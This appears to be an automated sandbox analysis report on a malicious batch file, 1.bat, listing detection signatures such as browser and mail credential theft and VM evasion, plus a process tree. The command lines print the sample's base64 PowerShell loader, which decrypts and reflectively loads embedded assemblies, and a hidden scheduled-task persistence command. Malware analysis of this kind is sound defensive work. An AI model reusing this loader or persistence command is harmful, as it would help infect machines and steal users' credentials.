Edit tour
Windows
Analysis Report
1.bat
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Yara detected Powershell dedcode and execute
Found large BAT file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suspicious command line found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 2180 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\1.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4404 cmdline:
cmd /c \"s et __=^&re m\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5144 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3424 cmdline:
cmd /c \"s et __=^&re m\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 3288 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\Deskt op\1.bat'; iex ([Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g('cG93ZXJ zaGVsbCAtd yBoaWRkZW4 7ZnVuY3Rpb 24gTURic0I oJFNlcVdSK Xskd0hHV2E 9W1N5c3Rlb S5TZWN1cml 0eS5Dcnlwd G9ncmFwaHk uQWVzXTo6Q 3JlYXRlKCk 7JHdIR1dhL k1vZGU9W1N 5c3RlbS5TZ WN1cml0eS5 DcnlwdG9nc mFwaHkuQ2l waGVyTW9kZ V06OkNCQzs kd0hHV2EuU GFkZGluZz1 bU3lzdGVtL lNlY3VyaXR 5LkNyeXB0b 2dyYXBoeS5 QYWRkaW5nT W9kZV06OlB LQ1M3OyR3S EdXYS5LZXk 9W1N5c3Rlb S5Db252ZXJ 0XTo6RnJvb UJhc2U2NFN 0cmluZygnc k00OStQTWJ uUlQyRjJpZ i9qTERmTGZ peW5XVC84b XQ5UlYvWE9 GN1ZnRT0nK Tskd0hHV2E uSVY9W1N5c 3RlbS5Db25 2ZXJ0XTo6R nJvbUJhc2U 2NFN0cmluZ ygnU29yNlJ DQ3l0RG4xc 2FtU0RaQWN Vdz09Jyk7J FRZQ3VNPSR 3SEdXYS5Dc mVhdGVEZWN yeXB0b3IoK TskS3l4VGU 9JFRZQ3VNL lRyYW5zZm9 ybUZpbmFsQ mxvY2soJFN lcVdSLDAsJ FNlcVdSLkx lbmd0aCk7J FRZQ3VNLkR pc3Bvc2UoK Tskd0hHV2E uRGlzcG9zZ SgpOyRLeXh UZTt9ZnVuY 3Rpb24gZ3J 4eUIoJFNlc VdSKXskTnJ jTFE9TmV3L U9iamVjdCB TeXN0ZW0uS U8uTWVtb3J 5U3RyZWFtK CwkU2VxV1I pOyRIVER1U z1OZXctT2J qZWN0IFN5c 3RlbS5JTy5 NZW1vcnlTd HJlYW07JFB aRkJzPU5ld y1PYmplY3Q gU3lzdGVtL klPLkNvbXB yZXNzaW9uL kdaaXBTdHJ lYW0oJE5yY 0xRLFtJTy5 Db21wcmVzc 2lvbi5Db21 wcmVzc2lvb k1vZGVdOjp EZWNvbXByZ XNzKTskUFp GQnMuQ29we VRvKCRIVER 1Uyk7JFBaR kJzLkRpc3B vc2UoKTskT nJjTFEuRGl zcG9zZSgpO yRIVER1Uy5 EaXNwb3NlK Ck7JEhURHV TLlRvQXJyY XkoKTt9JEl nR3V4PVtTe XN0ZW0uSU8 uRmlsZV06O lJlYWRMaW5 lcyhbQ29uc 29sZV06OlR pdGxlKTskR 2VMcUc9Z3J 4eUIgKE1EY nNCIChbQ29 udmVydF06O kZyb21CYXN lNjRTdHJpb mcoW1N5c3R lbS5MaW5xL kVudW1lcmF ibGVdOjpFb GVtZW50QXQ oJElnR3V4L CA1KS5TdWJ zdHJpbmcoM ikpKSk7JGJ Zbm1XPWdye HlCIChNRGJ zQiAoW0Nvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKFtTeXN0Z W0uTGlucS5 FbnVtZXJhY mxlXTo6RWx lbWVudEF0K CRJZ0d1eCw gNikuU3Vic 3RyaW5nKDI pKSkpO1tTe XN0ZW0uUmV mbGVjdGlvb i5Bc3NlbWJ seV06OkxvY WQoW2J5dGV bXV0kYllub VcpLkVudHJ 5UG9pbnQuS W52b2tlKCR udWxsLCRud WxsKTtbU3l zdGVtLlJlZ mxlY3Rpb24 uQXNzZW1ib HldOjpMb2F kKFtieXRlW 11dJEdlTHF HKS5FbnRye VBvaW50Lkl udm9rZSgkb nVsbCwkbnV sbCk7'))) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5824 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4456 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5328 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" [Console]: :Title = ( (Get-Sched uledTask). Actions.Ex ecute -joi n '').Cont ains('C:\U sers\user\ Desktop\1' ) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1576 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'OneNot e 43918' - Trigger (N ew-Schedul edTaskTrig ger -AtLog on) -Actio n (New-Sch eduledTask Action -Ex ecute 'C:\ Users\user \AppData\R oaming\str t.cmd') -S ettings (N ew-Schedul edTaskSett ingsSet -A llowStartI fOnBatteri es -Hidden -Executio nTimeLimit 0) -RunLe vel Highes t -Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4404 cmdline:
"C:\Window s\System32 \cmd.exe" /c start " " "C:\User s\user\App Data\Roami ng\strt.cm d" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1016 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\AppD ata\Roamin g\strt.cmd " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3784 cmdline:
cmd /c \"s et __=^&re m\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 4688 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\AppDa ta\Roaming \strt.cmd' ;iex ([Tex t.Encoding ]::UTF8.Ge tString([S ystem.Conv ert]::From Base64Stri ng('cG93ZX JzaGVsbCAt dyBoaWRkZW 47ZnVuY3Rp b24gTURic0 IoJFNlcVdS KXskd0hHV2 E9W1N5c3Rl bS5TZWN1cm l0eS5Dcnlw dG9ncmFwaH kuQWVzXTo6 Q3JlYXRlKC k7JHdIR1dh Lk1vZGU9W1 N5c3RlbS5T ZWN1cml0eS 5DcnlwdG9n cmFwaHkuQ2 lwaGVyTW9k ZV06OkNCQz skd0hHV2Eu UGFkZGluZz 1bU3lzdGVt LlNlY3VyaX R5LkNyeXB0 b2dyYXBoeS 5QYWRkaW5n TW9kZV06Ol BLQ1M3OyR3 SEdXYS5LZX k9W1N5c3Rl bS5Db252ZX J0XTo6RnJv bUJhc2U2NF N0cmluZygn ck00OStQTW JuUlQyRjJp Zi9qTERmTG ZpeW5XVC84 bXQ5UlYvWE 9GN1ZnRT0n KTskd0hHV2 EuSVY9W1N5 c3RlbS5Db2 52ZXJ0XTo6 RnJvbUJhc2 U2NFN0cmlu ZygnU29yNl JDQ3l0RG4x c2FtU0RaQW NVdz09Jyk7 JFRZQ3VNPS R3SEdXYS5D cmVhdGVEZW NyeXB0b3Io KTskS3l4VG U9JFRZQ3VN LlRyYW5zZm 9ybUZpbmFs QmxvY2soJF NlcVdSLDAs JFNlcVdSLk xlbmd0aCk7 JFRZQ3VNLk Rpc3Bvc2Uo KTskd0hHV2 EuRGlzcG9z ZSgpOyRLeX hUZTt9ZnVu Y3Rpb24gZ3 J4eUIoJFNl cVdSKXskTn JjTFE9TmV3 LU9iamVjdC BTeXN0ZW0u SU8uTWVtb3 J5U3RyZWFt KCwkU2VxV1 IpOyRIVER1 Uz1OZXctT2 JqZWN0IFN5 c3RlbS5JTy 5NZW1vcnlT dHJlYW07JF BaRkJzPU5l dy1PYmplY3 QgU3lzdGVt LklPLkNvbX ByZXNzaW9u LkdaaXBTdH JlYW0oJE5y Y0xRLFtJTy 5Db21wcmVz c2lvbi5Db2 1wcmVzc2lv bk1vZGVdOj pEZWNvbXBy ZXNzKTskUF pGQnMuQ29w eVRvKCRIVE R1Uyk7JFBa RkJzLkRpc3 Bvc2UoKTsk TnJjTFEuRG lzcG9zZSgp OyRIVER1Uy 5EaXNwb3Nl KCk7JEhURH VTLlRvQXJy YXkoKTt9JE lnR3V4PVtT eXN0ZW0uSU 8uRmlsZV06 OlJlYWRMaW 5lcyhbQ29u c29sZV06Ol RpdGxlKTsk R2VMcUc9Z3 J4eUIgKE1E YnNCIChbQ2 9udmVydF06 OkZyb21CYX NlNjRTdHJp bmcoW1N5c3 RlbS5MaW5x LkVudW1lcm FibGVdOjpF bGVtZW50QX QoJElnR3V4 LCA1KS5TdW JzdHJpbmco MikpKSk7JG JZbm1XPWdy eHlCIChNRG JzQiAoW0Nv bnZlcnRdOj pGcm9tQmFz ZTY0U3RyaW 5nKFtTeXN0 ZW0uTGlucS 5FbnVtZXJh YmxlXTo6RW xlbWVudEF0 KCRJZ0d1eC wgNikuU3Vi c3RyaW5nKD IpKSkpO1tT eXN0ZW0uUm VmbGVjdGlv bi5Bc3NlbW JseV06Okxv YWQoW2J5dG VbXV0kYllu bVcpLkVudH J5UG9pbnQu SW52b2tlKC RudWxsLCRu dWxsKTtbU3 lzdGVtLlJl ZmxlY3Rpb2 4uQXNzZW1i bHldOjpMb2 FkKFtieXRl W11dJEdlTH FHKS5FbnRy eVBvaW50Lk ludm9rZSgk bnVsbCwkbn VsbCk7'))) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 4120 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 1216 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" [Console]: :Title = ( (Get-Sched uledTask). Actions.Ex ecute -joi n '').Cont ains('C:\U sers\user\ AppData\Ro aming\strt ') MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1864 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 760 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'OneNot e 43918' - Trigger (N ew-Schedul edTaskTrig ger -AtLog on) -Actio n (New-Sch eduledTask Action -Ex ecute 'C:\ Users\user \AppData\R oaming\str t.cmd') -S ettings (N ew-Schedul edTaskSett ingsSet -A llowStartI fOnBatteri es -Hidden -Executio nTimeLimit 0) -RunLe vel Highes t -Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5388 cmdline:
C:\Windows \SYSTEM32\ cmd.exe /c "C:\Users \user\AppD ata\Roamin g\strt.cmd " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security | ||
JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |